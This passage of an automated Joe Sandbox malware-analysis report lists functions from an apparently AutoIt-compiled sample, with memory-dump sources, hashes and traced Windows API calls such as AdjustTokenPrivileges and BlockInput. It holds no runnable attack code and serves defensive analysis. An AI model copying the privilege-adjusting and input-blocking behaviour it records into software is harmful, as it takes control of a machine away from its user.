                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: AdjustCloseHandlePrivilegesToken
                        • String ID:
                        • API String ID: 81990902-0
                        • Opcode ID: 69d7e24243530dfe97f8e4ad633f019f4469c10d1b362a43ae89e1c6c6b0d609
                        • Instruction ID: 88e9f763a27dc47ace0d1d6b0b452fb8d537e97a478c1ff1737e332bb70e5eca
                        • Opcode Fuzzy Hash: 69d7e24243530dfe97f8e4ad633f019f4469c10d1b362a43ae89e1c6c6b0d609
                        • Instruction Fuzzy Hash: 7AE0BF72014651AEE7262B51FC05E7777EDFB04311F14882DF5A6844B5DB62BC90DB50
                        Function 0036676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00366766,?,?,00000008,?,?,0036FEFE,00000000), ref: 00366998
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ExceptionRaise
                        • String ID:
                        • API String ID: 3997070919-0
                        • Opcode ID: 5b6a1589b80ec558d59c3fe25b0cdd221120a2112f4893ef341921830b32eaa3
                        • Instruction ID: d7ed77ba6054bb5d523508c280ce8799470c110edab6bdb84e16fb58a09c3699
                        • Opcode Fuzzy Hash: 5b6a1589b80ec558d59c3fe25b0cdd221120a2112f4893ef341921830b32eaa3
                        • Instruction Fuzzy Hash: DAB13A716106089FD716CF28C48AB657BE0FF453A4F2AC65CE899CF2A6C335E991CB40
                        Function 0034B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID: 0-3916222277
                        • Opcode ID: 91a2cac8dc4da12abc6023437480da3687d9d64314569f624b018ad9a39e2a4a
                        • Instruction ID: 21f3bb1cb53c90364f522f1f1585a802f9efaf1e54ae6137473967c12c668fc0
                        • Opcode Fuzzy Hash: 91a2cac8dc4da12abc6023437480da3687d9d64314569f624b018ad9a39e2a4a
                        • Instruction Fuzzy Hash: 67126E759002299FCB26DF59C880AEEB7F5FF48310F55819AE849EB251DB709E81CF90
                        Function 003AEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • BlockInput.USER32(00000001), ref: 003AEABD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: BlockInput
                        • String ID:
                        • API String ID: 3456056419-0
                        • Opcode ID: 94c4fddd41e4fd3c6d9e8af8e0175542941e9220c4715b5238f79e0e7ffe22e8
                        • Instruction ID: d473bd03eb43609c711225ce92a3f5e91156f8c4a38fb40925a843746b9f566c
                        • Opcode Fuzzy Hash: 94c4fddd41e4fd3c6d9e8af8e0175542941e9220c4715b5238f79e0e7ffe22e8
                        • Instruction Fuzzy Hash: 92E01A362202049FD711EF59D844E9AF7EDEF99760F00841AFD49DB351DA70AC408B90
                        Function 003509D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                        Download Yara Rule
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,003503EE), ref: 003509DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 7e3fb02ebf6dc3b12a4f888f200c6e03437fce0a10f339fec2caa037051c5189
                        • Instruction ID: 6194fd11ecca6938c5ef420c80c741148b50d3afcd87d08ef425616cca335706
                        • Opcode Fuzzy Hash: 7e3fb02ebf6dc3b12a4f888f200c6e03437fce0a10f339fec2caa037051c5189
                        • Instruction Fuzzy Hash:
                        Function 0035781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                        • Instruction ID: f1968dd1a50a5da8f6c701b57a2c3476d648fbefaa0fa1e4bd4f40afd9bb10d0
                        • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                        • Instruction Fuzzy Hash: 7F51677160C6455BDB3B8628A85FFFE23999B12343F190509DC82DB6B2C715EE0DD3A2
                        Function 003A2046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0&@
                        • API String ID: 0-1848180278
                        • Opcode ID: 5bec0f454ff8e4b06f871400d07f5d20693cbe5e45254eb8c834d25586d0f7ff
                        • Instruction ID: 9de7b97fbf7528f52a019c4a515bdacf3607961dc7c54bf4d612678c579202fe
                        • Opcode Fuzzy Hash: 5bec0f454ff8e4b06f871400d07f5d20693cbe5e45254eb8c834d25586d0f7ff
                        • Instruction Fuzzy Hash: 2521D5322206118BD728CE79C92267F73E5EB54310F158A2EE4A7D73D0DE7AA904DB84
                        Function 00366DD9 Relevance: .6, Instructions: 637COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bd9af9f2d04dd9838f72a2c4aad2394e77dbc3f51be658f62c830b97f66ecca9
                        • Instruction ID: 87b1cebe20a055e0e646aaf7721ccca6b24fc8e1b4257e4b8001c9091c69b1e1
                        • Opcode Fuzzy Hash: bd9af9f2d04dd9838f72a2c4aad2394e77dbc3f51be658f62c830b97f66ecca9
                        • Instruction Fuzzy Hash: 86323422D2AF414DD7239635DC22336A34DAFB73C9F55D737E82AB59A9EB29C4834100
                        Function 0034CC39 Relevance: .6, Instructions: 635COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e55149ace45c7def1be7fb61e160e67d56db4945c9785c408e81ed85a4a2600d
                        • Instruction ID: 87922e76f4e6d2fd5d3c938dc8fa292d67330d1c10064cc05516cf8c9a47f5a5
                        • Opcode Fuzzy Hash: e55149ace45c7def1be7fb61e160e67d56db4945c9785c408e81ed85a4a2600d
                        • Instruction Fuzzy Hash: 5F322931A203058BCF2BEF28C4D467D77E5EB45300F2AA5A6D959CB691D334ED82DB60
                        Function 00337920 Relevance: .6, Instructions: 563COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1c417f1ac3f63f7d37fba13b45f8838a583cc6faf30d1dd7da108ca6e82b8b33
                        • Instruction ID: b6eb8ae1ee6b93fa5049093fe66cede10633e858352e03797b0a45cd189a05d1
                        • Opcode Fuzzy Hash: 1c417f1ac3f63f7d37fba13b45f8838a583cc6faf30d1dd7da108ca6e82b8b33
                        • Instruction Fuzzy Hash: 3022C5B0A04609DFDF2ACF64C881BAEB7F5FF44300F148529E816AB291E779AD55CB50
                        Function 003391C0 Relevance: .5, Instructions: 475COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d1e667c9648b5ab71cf001b0184c076ca65d46efc39fe8e8ff8ddca2a831c325
                        • Instruction ID: a7d6568ea985bfd08146b545012f90ad704c955f8f8a54da772715e7f8e639ee
                        • Opcode Fuzzy Hash: d1e667c9648b5ab71cf001b0184c076ca65d46efc39fe8e8ff8ddca2a831c325
                        • Instruction Fuzzy Hash: 8202C7B1E0010AEFDB16DF54D881AAEB7B5FF48300F118169E81ADF290E735EA50CB91
                        Function 00357A4A Relevance: .2, Instructions: 237COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5c7949ccfd2543fe1f458a2429c216c18799797b714e129f0d1d6ee25222db85
                        • Instruction ID: 24792e704e75b2cc33db58e763e26862aea1949da438974faa2a8e0e60c2dd03
                        • Opcode Fuzzy Hash: 5c7949ccfd2543fe1f458a2429c216c18799797b714e129f0d1d6ee25222db85
                        • Instruction Fuzzy Hash: 7461677160878957EA3B9A28B899FBE2398DF41303F150919EC43DF3B1DA119E4E8355
                        Function 00357CA7 Relevance: .2, Instructions: 237COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2ebbc7bcb8d8f7fb0e78d999dfd2b6e9102fdd9727f556312b7c99453cedebec
                        • Instruction ID: eb7329674dd2250a7e7fad5dc95f17bbf47f05f294ee46dd4d81c7f80690f181
                        • Opcode Fuzzy Hash: 2ebbc7bcb8d8f7fb0e78d999dfd2b6e9102fdd9727f556312b7c99453cedebec
                        • Instruction Fuzzy Hash: 8C61997120870957DE3B5A287896FBE23E8AF02703F110949EC43DF6B1EA129D4E8251
                        Function 013835F0 Relevance: .1, Instructions: 92COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189780107.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1380000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                        • Instruction ID: dde3365dac0a371ea6cd5d7cc0d16c0031b2b0e325ff3a49f613a2039476f2fb
                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                        • Instruction Fuzzy Hash: 2841D271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                        Function 01383480 Relevance: .0, Instructions: 35COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189780107.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1380000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                        • Instruction ID: 6df2accca761ff15154a30e385f8e7aaeea4caf24f590d198d1d48c844b39137
                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                        • Instruction Fuzzy Hash: A2019278A00209EFCB45EF98C5909AEF7B5FB48714F208599D809A7701D730EE41DB80
                        Function 013834E0 Relevance: .0, Instructions: 35COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189780107.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1380000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                        • Instruction ID: a9ac80da6b893e9babcc68c4fa508fceebaba1df1f07b828c7427349c1df5083
                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                        • Instruction Fuzzy Hash: 2D019278A04209EFCB44EF98C5909AEF7B5FB48714F208599D809A7701D730EE41DB90
                        Function 01381E70 Relevance: .0, Instructions: 6COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189780107.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1380000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                        Function 003B2ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                        Download Yara Rule
                        APIs
                        • DeleteObject.GDI32(00000000), ref: 003B2B30
                        • DeleteObject.GDI32(00000000), ref: 003B2B43
                        • DestroyWindow.USER32 ref: 003B2B52
                        • GetDesktopWindow.USER32 ref: 003B2B6D
                        • GetWindowRect.USER32(00000000), ref: 003B2B74
                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 003B2CA3
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 003B2CB1
                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2CF8
                        • GetClientRect.USER32(00000000,?), ref: 003B2D04
                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 003B2D40
                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2D62
                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2D75
                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2D80
                        • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2D89
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2D98
                        • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2DA1
                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2DA8
                        • GlobalFree.KERNEL32(00000000), ref: 003B2DB3
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2DC5
                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,003CFC38,00000000), ref: 003B2DDB
                        • GlobalFree.KERNEL32(00000000), ref: 003B2DEB
                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 003B2E11
                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 003B2E30
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2E52
                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B303F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                        • String ID: $AutoIt v3$DISPLAY$static
                        • API String ID: 2211948467-2373415609
                        • Opcode ID: 5a15b29d0f92d6443157d77f33eaa8f4a3937e3f0f29ae87378681213ebd7574
                        • Instruction ID: 1de84994881bc7ba5186d394dc5446646b45e41f7bdbbae5efb9268e0dcd2ec8
                        • Opcode Fuzzy Hash: 5a15b29d0f92d6443157d77f33eaa8f4a3937e3f0f29ae87378681213ebd7574
                        • Instruction Fuzzy Hash: FD027C71910219AFDB16DF64CD89EAE7BB9EF49314F048518F919EB2A1CB70ED01CB60
                        Function 003C70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                        Download Yara Rule
                        APIs
                        • SetTextColor.GDI32(?,00000000), ref: 003C712F
                        • GetSysColorBrush.USER32(0000000F), ref: 003C7160
                        • GetSysColor.USER32(0000000F), ref: 003C716C
                        • SetBkColor.GDI32(?,000000FF), ref: 003C7186
                        • SelectObject.GDI32(?,?), ref: 003C7195
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 003C71C0
                        • GetSysColor.USER32(00000010), ref: 003C71C8
                        • CreateSolidBrush.GDI32(00000000), ref: 003C71CF
                        • FrameRect.USER32(?,?,00000000), ref: 003C71DE
                        • DeleteObject.GDI32(00000000), ref: 003C71E5
                        • InflateRect.USER32(?,000000FE,000000FE), ref: 003C7230
                        • FillRect.USER32(?,?,?), ref: 003C7262
                        • GetWindowLongW.USER32(?,000000F0), ref: 003C7284
                          • Part of subcall function 003C73E8: GetSysColor.USER32(00000012), ref: 003C7421
                          • Part of subcall function 003C73E8: SetTextColor.GDI32(?,?), ref: 003C7425
                          • Part of subcall function 003C73E8: GetSysColorBrush.USER32(0000000F), ref: 003C743B
                          • Part of subcall function 003C73E8: GetSysColor.USER32(0000000F), ref: 003C7446
                          • Part of subcall function 003C73E8: GetSysColor.USER32(00000011), ref: 003C7463
                          • Part of subcall function 003C73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003C7471
                          • Part of subcall function 003C73E8: SelectObject.GDI32(?,00000000), ref: 003C7482
                          • Part of subcall function 003C73E8: SetBkColor.GDI32(?,00000000), ref: 003C748B
                          • Part of subcall function 003C73E8: SelectObject.GDI32(?,?), ref: 003C7498
                          • Part of subcall function 003C73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 003C74B7
                          • Part of subcall function 003C73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003C74CE
                          • Part of subcall function 003C73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 003C74DB
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                        • String ID:
                        • API String ID: 4124339563-0
                        • Opcode ID: 3984ef40b79429bd1c99559a4bb52de1c99b7419b84490aeac38f51ccb25850b
                        • Instruction ID: 287f7da80c1d5ea5cb6ab1ebe75e7da88d9714212613e536b2618f1be68aba8c
                        • Opcode Fuzzy Hash: 3984ef40b79429bd1c99559a4bb52de1c99b7419b84490aeac38f51ccb25850b
